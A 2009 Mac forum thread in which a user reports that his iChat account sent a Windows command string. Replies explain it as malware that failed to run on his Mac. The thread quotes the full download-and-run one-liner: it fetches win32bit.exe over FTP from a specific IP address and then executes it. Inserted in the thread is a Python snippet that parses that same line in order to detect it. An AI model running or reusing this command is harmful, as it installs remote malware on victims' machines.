Mac = Zombie machine? Windows command line?

Discussion in 'Community Discussion' started by spaceboots06, Sep 14, 2009.

  1. spaceboots06 macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #1
    Hello everyone!

    I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

    %systemroot%\system32\cmd.exe

    del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

    j

    These three messages were sent by me! To my friend! I don't even know what they mean. I know they have something to do with Windows machines, and I know that del means delete, so I'm still trying to figure out what's going on. Something with the command line I assume.

    Anyway, could this be something to do with zombie machines or whatever? I have no idea what is going on. I would have put this in Mac help, but it seems as if this could also be a Windows problem too. No idea.

    Help!

    Thanks.

    Edit: Oh, yeah. Now Software Update wants me to update iTunes, QuickTime, Java and Security Update 2009-005. Should I do it?
     
  2. barr08 macrumors 65816

    barr08

    Joined:
    Aug 9, 2006
    Location:
    Boston, MA
    #2
    Do you use VNC or any remote desktop utility?
     
  3. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #3
    That is not Mac (darwin) command line, that is Windows command line.
    How it happened, I don't know.

    Yes, update everything in Software Updater.
     
  4. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #4
    I have Jaadu VNC for my iPhone, allowing me to view my screen and control my screen from my iPhone, but it wasn't enabled. I also use a password on the screen sharing setting on my computer! I'm in a techy university right now, so could someone have cracked the password or something and used my computer? Wouldn't they have tried to do more damage than they already attempted to do? Should I reformat my computer? I'm pretty bugged out right now.
     
  5. Zombie Acorn macrumors 65816

    Zombie Acorn

    Joined:
    Feb 2, 2009
    Location:
    Toronto, Ontario
    #5
    Definitely weird. May have been a hijack attempt. Obviously you aren't going to have a system32 folder since you are on a Mac.

    It looks like it's trying to install win32bit.exe into your system32 folder, which is normally the location where most viruses etc. locate themselves.
     
  6. electroshock macrumors 6502a

    electroshock

    Joined:
    Sep 7, 2009
    #6
    Definitely!!! ALWAYS stay on top of patches, since they usually contain critical security fixes.

    It looks like you may have hit malware somewhere. Fortunately, it's a Windows-based malware so it had no effect on your Mac. It appears to connect to a server in Chile to download an actual Windows executable that then probably takes over a victim Windows PC. I don't think it actually ran in your case.

    Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).

    So best defense is to apply all updates, reboot, and make sure your antivirus definitions are up to date, too.
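
The message from post #1, taken apart the way post #6 reads it, as an added example that is not part of the original thread: the `&`-separated steps append FTP commands to a file with `echo ... >>`, hand that file to `ftp -n -s:`, then start the downloaded file. The function name `analyze`, the two regexes and the benign sample message are constructed for illustration.

```python
import re

# Message copied from post #1 of this thread.
THREAD_MESSAGE = (
    "del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq "
    "&echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq"
)
# Constructed harmless message that mentions the same words.
BENIGN_MESSAGE = "can you echo that back to me & ftp the file later?"

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.I)  # echo <text> >> <file>
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)             # ftp ... -s:<file>


def analyze(message):
    """Describe an echo-built FTP script that is then run, or return None."""
    steps = [s.strip() for s in message.split("&") if s.strip()]
    scripts, script_file, ftp_at = {}, None, None
    for i, step in enumerate(steps):
        echo, ftp = ECHO_RE.match(step), FTP_RE.match(step)
        if echo:  # collect the lines appended to each script file
            scripts.setdefault(echo.group(2).lower(), []).append(echo.group(1))
        elif ftp and ftp.group(1).lower() in scripts:
            script_file, ftp_at = ftp.group(1).lower(), i
            break
    if script_file is None:
        return None
    found = {"script_file": script_file, "host": None, "port": None,
             "user": None, "downloads": [], "executed": []}
    for line in scripts[script_file]:
        words = line.split()
        if not words:
            continue
        verb = words[0].lower()
        if verb == "open" and len(words) > 1:
            found["host"] = words[1]
            found["port"] = int(words[2]) if len(words) > 2 and words[2].isdigit() else 21
        elif verb == "user" and len(words) > 1:
            found["user"] = words[1]
        elif verb == "get" and len(words) > 1:
            found["downloads"].append(words[-1])  # local name if given, else remote
    names = {d.lower() for d in found["downloads"]}
    for step in steps[ftp_at + 1:]:  # was a fetched file started afterwards?
        if step.split()[0].lower() in names:
            found["executed"].append(step.split()[0])
    return found

if __name__ == "__main__":
    print(analyze(THREAD_MESSAGE), analyze(BENIGN_MESSAGE), sep="\n")
```

A non-`None` result with a non-empty `executed` list is the download-then-run pattern; the host and port it reports are the values to look for in firewall or proxy logs.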
     
  7. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #7
    Alright, cool. No immediate damage done, seeing that the messages that were sent came from and went to Mac machines.

    My question is though, where could this have come from? Did I download a bad program? Is my Screen Sharing thingy vulnerable? Any ideas? I'm about to disable Screen Sharing right now.

    Yeah! That's what's freaking me out!!! This dumb chick told me to download this file sharing program called Shakes Peer and I listened. I think that's what the problem is, even though I only used it for about five minutes. Either that, or Screen Sharing.

    I'm still very surprised that this was the only thing that happened, and that I'm not missing any files or there are no little prank things that the typical hacker person would do.
     
  8. mags631 Guest

    Joined:
    Mar 6, 2007
    #8
    Please tell me your chat response was something like:
     
  9. iShater macrumors 604

    iShater

    Joined:
    Aug 13, 2002
    Location:
    Chicagoland
    #9
    Are you sure it was coming from YOUR end? Not something the other side accidentally pasted in the screen?
     
  10. spaceboots06 thread starter macrumors 6502a

    spaceboots06

    Joined:
    Jun 13, 2009
    Location:
    The Rotten Apple
    #10
    Hahahahaha, sadly, no.

    It was coming from my end. I asked "WTF?" when I came back to the computer and the person said that they ignored the "gibberish." They thought nothing of it.
     
